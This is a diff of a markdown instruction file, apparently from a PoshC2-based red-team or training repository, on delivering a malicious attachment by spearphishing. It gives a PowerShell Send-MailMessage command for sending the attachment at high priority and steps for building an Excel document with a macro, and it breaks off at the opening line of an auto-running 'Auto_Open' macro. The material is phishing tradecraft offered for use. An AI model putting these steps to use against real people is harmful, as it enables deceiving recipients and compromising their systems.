ChefDandy/CTE-menu/Poshc2/instructions/Spearfishing_attachment.md

 ## Exploit syntax:

-* Example: Send-MailMessage -SmtpServer <smtp server ip> -Port 25 -to <enter email here> -From <enter email here> -Priority High -Subject "enter subject here" -Body "enter body of message here" -Attachment “<absolute path of resume file>” (file can be drag and dropped at the end of the command to autofill file path) OR Email through Outlook and attach malicious file to email

-* Excel Example:
+* Malicious Macro in Excel Example:

-    * Use the SendPhishing powershell scripts as a template for sending emails over powershell
+    1. Use the [SendPhishing](/Poshc2/pslo_scripts/Purple_pslo_scripts/SendPhishingAttachment.ps1) script as a template for sending emails over powershell
-    * Use the script below and insert it into the macro list of an Excel document.
+    2. Create an Excel document.
+Use the script below and insert it into the macro list:

     ```vbscript
     Sub Auto_Open()